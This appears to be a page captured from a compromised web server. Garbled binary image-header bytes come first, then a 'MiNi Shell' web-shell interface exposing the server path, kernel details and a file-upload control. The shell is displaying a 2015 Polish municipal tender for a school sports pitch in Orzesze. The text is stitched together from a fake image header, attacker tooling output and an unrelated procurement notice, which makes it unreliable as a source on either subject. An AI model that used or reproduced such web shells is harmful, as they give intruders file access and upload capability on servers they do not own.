JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151223/189147-N-2015.html

<p class="kh_header"><b>Orzesze: Budowa boiska wielofunkcyjnego z bieżnią przy Gimnazjum Nr 3 
w Orzeszu Gardawicach</b><br>
<b>Numer ogłoszenia: 189147 - 2015; data zamieszczenia: 23.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orzesze , ul. Św. Wawrzyńca 21, 43-180 Orzesze, woj. śląskie, tel. 032 3248800, faks 032 3248826.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.orzesze.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa boiska wielofunkcyjnego z bieżnią przy Gimnazjum Nr 3 
w Orzeszu Gardawicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Budowa boiska wielofunkcyjnego z bieżnią przy Gimnazjum Nr 3 w Orzeszu Gardawicach zgodnie z dokumentacją projektową i Specyfikacją Techniczną Wykonania i Odbioru Robót (zał. Nr 1 do SIWZ) 
W ramach niniejszego zadania projekt przewiduje:
rozebranie istniejącego boiska do piłki ręcznej z nawierzchni asfaltowej wraz z wyposażeniem,
rozebranie boiska do siatkówki plażowej, zeskoczni do skoku w dal wraz z drewnianą skrzynią.
częściowe rozebranie starej bieżni o nawierzchni z tłucznia czerwonego.
rozebranie i utylizacja starych 26 sztuk opon samochodowych zlokalizowanych wzdłuż boiska asfaltowego od jego zachodniej strony
częściowe rozebranie nawierzchni utwardzonych i chodników wraz z obrzeżami.
rozebranie murka oporowego wraz z fundamentem przy wyjściu awaryjnym ze szkoły
i częściową przebudowę pochylni dla osób niepełnosprawnych.
budowę boiska wielofunkcyjnego do mini koszykówki (2 boiska o wymiarach 11,0 x 20,0 m), piłki siatkowej (9,0 x 18,0 m) oraz piłki ręcznej (20,0 x 40,0 m) o nawierzchni poliuretanowej. Całkowity wymiar boiska wielofunkcyjnego 22,0 x 44,0 m,
budowa czterotorowej bieżni sportowej o maksymalnej długości 65 m o nawierzchni poliuretanowej (jak boisko) z obrzeżami betonowymi 8x30x100 cm,
budowa boiska do piłki plażowej o nawierzchni piaszczystej o wymiarach 8,0 x 16,0 m. Całkowity wymiar boiska wraz ze strefami bezpieczeństwa 13,0 x 21,0 m. Boisko będzie posiadało obrzeża gumowe o wymiarach 5x25x100 cm,
budowę zeskoczni do skoku w dal o wymiarach 3,0 x 9,0 m. W ramach rozbiegu wykorzystany zostanie jeden z torów bieżni czterotorowej, będzie on wydłużony o belkę do odbicia i 1,0 m toru o nawierzchni z poliuretanu o całkowitej szerokości 1,27 m (szerokość toru 1,22 m), natomiast zeskocznia z nawierzchni piaszczystej zakończona skrzynią drewnianą o przekroju 5x30cm utwierdzoną w ławie betonowej.
rozbudowa dojść, dojazdów i chodników oraz opasek z nawierzchni z kostki betonowej gr 8 cm,
budowa schodów terenowych z kostki betonowej
budowa brakującego ogrodzenia panelowego wokół szkoły wys. 1,45 m i ogrodzenia z siatki plecionej 1,45 m
budowę piłko-chwytów o wysokości 4,0 m z siatki polipropylenowej gr. 5,0 mm wzmacnianej linką stalową (UWAGA: brak tego zapisu w dokumentacji, dopisane przez Zamawiającego), oczka 60x60mm, zawieszonej na słupach z rury stalowej O 76 x 3,0 mm. Siatka zawieszona za pomocą linki stalowej cynkowanej O 4 mm, napiętej za pomocą śrub rzymskich. Zastrzały słupów skrajnych z rur stalowych O 60 x 3,0 mm.
wyprofilowanie i obsianie trawą istniejących skarp,
mała architektura: 6 koszy i 6 ławek ( Ławka dla zawodników na boisko zewnętrzne. konstrukcja stalowa, cynkowana ogniowo, malowana proszkowo 10 siedzisk plastikowych z oparciem o wysokości 25 cm  w rzędzie) - UWAGA: nastąpiła zmiana ilościowa i jakościowa w stosunku do dokumentacji (zamawiający wymagał będzie: 6 koszy i 6 ławek)
Wykonanie i montaż tablicy z regulaminem obiektu (tablica dibond gr.3mm o wymiarach 50cm X 70cm)
rozbudowanie systemu monitoringu i wyposażenie w dwie kamery oraz nowoczesny 32 kanałowy rejestrator.

Po rozbiórce nawierzchni asfaltowej projektuje się następujący układ warstw:
Warstwy podbudowy od dołu:
grunt rodzimy, zagęszczony do min. 0,98
geowłóknina o szerokości 5 m - geowłóknina wzmocniona z włókien ciągłych z polipropylenu o masie min. 135 g/m2 i wytrzymałości na rozciąganie min. 5 kN/m
warstwa odsączająca z piasku (0-2 mm) o gr. 16 cm po zagęszczeniu
warstwa z kruszywa kamiennego (fr. 0-31,5 mm) o gr. 10 cm po zagęszczeniu
warstwa z tłucznia kamiennego gr 15 cm - (fr. 4-31,5 mm)
warstwa stabilizująca ET gr 3,5 cm
nawierzchnia poliuretanowa gr. 12 mm ( 6mm SBR + 6mm EPDM)

Zamawiający dopuszcza zastosowanie innych materiałów niż zastosowane w projekcie, równoważnych,  o odpowiednich parametrach technicznych i jakościowych. Parametry  techniczne i jakościowe dla zastosowanych w dokumentacji technicznej materiałów są wartościami minimalnymi.
UWAGA: Zamawiający dopuszcza zastosowanie nawierzchni poliuretanowych o wytrzymałości na rozdzieranie (Mpa) min. lub równej 130

2. Warunki  gwarancji - min. 3 lata, max 5 lat  gwarancji na wykonane roboty oraz zastosowane materiały licząc od dnia ostatecznego odbioru robót

3. Podwykonawcy:
1. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.
2. Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych części zamówienia.
3. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom. W przypadku gdy Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia, zdolności finansowe lub ekonomiczne podwykonawcy w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art.22 ust.1 Ustawy Wykonawca zobowiązany jest do podania nazw (firm) podwykonawców, na których zasoby się powołuje.
4. Wymagania dotyczące umowy o podwykonawstwo, której przedmiotem są roboty budowlane, usługi lub dostawy, których niespełnienie spowoduje zgłoszenie przez zamawiającego odpowiednio zastrzeżeń lub sprzeciwu określone zostały w załączniku nr 6 do SIWZ tj. projekcie umowy
5. Zamawiający nie określa przedmiotu umów o podwykonawstwo, który podlega obowiązkowi  przedkładania Zamawiającemu poświadczonej za zgodność z oryginałem kopię zawartej umowy o podwykonawstwo, której przedmiotem są dostawy lub usługi, w terminie 7  dni od dnia jej zawarcia, z wyłączeniem umów o podwykonawstwo o wartości mniejszej niż 0,5% umowy w sprawie zamówienia publicznego. Wyłączenie, o którym mowa w zdaniu pierwszym, nie dotyczy umów o podwykonawstwo o wartości większej niż 50 000 zł brutto.
KODY Wspólnego Słownika Zamówień (CPV) określające przedmiot zamówienia 
Grupa robót: 45100000-8 Przygotowanie terenu pod budowę 
Klasa robót: 45.11 Burzenie i rozbiórka obiektów budowlanych; roboty ziemne 
Kategoria robót: 45111000-1 Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne 
Grupa robót: 45100000-8 Przygotowanie terenu pod budowę 
Klasa robót: 45110000-1 Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne 
Kategoria robót: 45112500-0 Usuwanie gleby 
Grupa robót: 45200000-9 Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej, 
Klasa robót: 45230000-8 Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei, wyrównywanie terenu 
Kategoria robót 45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg 
Klasa robót: 45260000-7 Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty 
specjalistyczne 
Kategoria robót: 45262300-4 Betonowanie 
Grupa robót: 453 Roboty budowlane w zakresie instalacji 
Klasa robót: 4534 Roboty budowlane w zakresie instalacji, instalowanie ogrodzeń dróg, płotów i sprzętu 
ochronnego 
Kategoria robót: 45342000-6 Wznoszenie ogrodzeń 
45340000-2 Instalowanie ogrodzeń, płotów i sprzętu ochronnego 
Grupa robót: 452 Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej, 
Klasa robót: 4521 Roboty budowlane w zakresie budynków 
Kategoria robót 4521221-1 Roboty budowlane związane z obiektami na terenach sportowych 
Grupa robót: 452 Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej, 
Klasa robót: 4523 Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i obiektów sportowych 
Kategoria robót 45233253-7 Roboty w zakresie nawierzchni dróg dla pieszych 
Grupa robót: 45100000-8 Przygotowanie terenu pod budowę 
Klasa robót: 45110000 Burzenie i rozbiórka obiektów budowlanych; roboty ziemne 
Kategoria robót: 45112723-9 Roboty w zakresie kształtowania placów zabaw 
37535200-7 Wyposażenie placów zabaw 
Grupa robót: 451 Przygotowanie terenu pod budowę 
Klasa robót: 4511 Roboty w zakresie burzenia i rozbiórki obiektów budowlanych: roboty ziemne 
Kategoria robót: 45112710-5 Roboty w zakresie kształtowania terenów zielonych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.10.00-1, 45.11.00.00-1, 45.11.25.00-0, 45.20.00.00-9, 45.23.00.00-8, 45.23.30.00-7, 45.26.23.00-4, 45.34.20.00-6, 45.34.00.00-2, 45.21.21.22-1, 45.23.32.53-7, 45.11.27.23-9, 45.11.27.10-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium. Zamawiający określa kwotę wadium w  wysokości 16.000,00 zł 
Wadium może być wnoszone w jednej lub kilku następujących formach:
	1) pieniądzu;
	2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, 
z tym ze poręczenie kasy jest zawsze poręczeniem pieniężnym 
	3) gwarancjach bankowych;
	4)gwarancjach ubezpieczeniowych;
	5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42 poz.275).
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy nr 55 8454 1040 2002 0000 0329 0002 Orzesko-Knurowskiego Banku Spółdzielczego Oddział Orzesze. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
Wadium wnosi się przed upływem terminu składania ofert tj. do dnia 11.01.2016 do godz. 9:00 
O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie decyduje data i godzina wpływu środków na rachunek bankowy zamawiającego.
Wadium wnoszone w pozostałych formach należy złożyć do UM ORZESZE pok. nr 19.  Wadium wnosi się przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesji, zezwolenia lub licencji  - zamawiający nie dokonuje opisu żadnych wymagań do tego warunku 
Ww. warunki zostaną uznane za spełnione jeżeli wykonawca złoży dokumenty, o których mowa  punkcie VI specyfikacji, w przypadku braku szczegółowego opisu spełnienia warunku udziału w postępowaniu jego weryfikacja odbędzie się w oparciu o oświadczenie o spełnieniu warunku udziału w postępowaniu.
Ocena spełniania warunków nastąpi w oparciu o dołączone do oferty dokumenty na zasadzie spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia - Wykonawca wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie: min. 1 zadania polegające na budowie obiektu z nawierzchnią poliuretanową o powierzchni min. 800m2
Ww. warunki zostaną uznane za spełnione jeżeli wykonawca złoży dokumenty, o których mowa  punkcie VI specyfikacji, w przypadku braku szczegółowego opisu spełnienia warunku udziału w postępowaniu jego weryfikacja odbędzie się w oparciu o oświadczenie o spełnieniu warunku udziału w postępowaniu.
Ocena spełniania warunków nastąpi w oparciu o dołączone do oferty dokumenty na zasadzie spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym  - W zakresie dysponowania odpowiednim potencjałem technicznym zamawiający nie dokonuje opisu żadnych wymagań do tego warunku 
Ww. warunki zostaną uznane za spełnione jeżeli wykonawca złoży dokumenty, o których mowa  punkcie VI specyfikacji, w przypadku braku szczegółowego opisu spełnienia warunku udziału w postępowaniu jego weryfikacja odbędzie się w oparciu o oświadczenie o spełnieniu warunku udziału w postępowaniu.
Ocena spełniania warunków nastąpi w oparciu o dołączone do oferty dokumenty na zasadzie spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania  osobami zdolnymi do wykonania zamówienia - W zakresie dysponowania odpowiednim  osobami zdolnymi do wykonania zamówienia wykaże, że dysponuje  lub będzie dysponował osobami /minimum 1 osoba/,  które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami tj. osób posiadających uprawnienia w zakresie kierowania robotami budowlanymi w  specjalności konstrukcyjno-budowlanej
Ww. warunki zostaną uznane za spełnione jeżeli wykonawca złoży dokumenty, o których mowa  punkcie VI specyfikacji, w przypadku braku szczegółowego opisu spełnienia warunku udziału w postępowaniu jego weryfikacja odbędzie się w oparciu o oświadczenie o spełnieniu warunku udziału w postępowaniu.
Ocena spełniania warunków nastąpi w oparciu o dołączone do oferty dokumenty na zasadzie spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sytuacji ekonomicznej i finansowej - posiada środki finansowe lub wykaże zdolność kredytową w kwocie nie mniejszej niż 500.000,00 zł
Ww. warunki zostaną uznane za spełnione jeżeli wykonawca złoży dokumenty, o których mowa  punkcie VI specyfikacji, w przypadku braku szczegółowego opisu spełnienia warunku udziału w postępowaniu jego weryfikacja odbędzie się w oparciu o oświadczenie o spełnieniu warunku udziału w postępowaniu.
Ocena spełniania warunków nastąpi w oparciu o dołączone do oferty dokumenty na zasadzie spełnia/ nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres udzielanej gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany i uzupełnienia umowy wymagają formy pisemnej pod rygorem nieważności. Zmiany mogą być dokonywane jedynie w granicach określonych art. 144 ust. 1 Ustawy Prawo zamówień publicznych.
2.	Zamawiający przewiduje możliwość zmiany postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co  najmniej jednej z okoliczności wymienionych poniżej zgodnie z warunkami podanymi poniżej.

A. Zmiana terminu i zakresu  realizacji przedmiotu umowy
1. zmiany spowodowane warunkami atmosferycznymi, geologicznymi, archeologicznymi, w szczególności:
a)         klęski żywiołowe; 
b)         warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, w szczególności: temperatury powietrza poniżej 0,0 C, wiatr uniemożliwiający pracę maszyn budowlanych, gwałtowne opady deszczu (oberwanie chmury), śniegu, gradobicie, burze z wyładowaniami atmosferycznymi 
c)         warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń zgodnie z technologią przewidzianą przez producentów d)        niewypały i niewybuchy; 
e)        wykopaliska archeologiczne; 

3.	Zakres istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy mogących stanowić podstawę do przedłużenia terminu wykonania robót budowlanych:
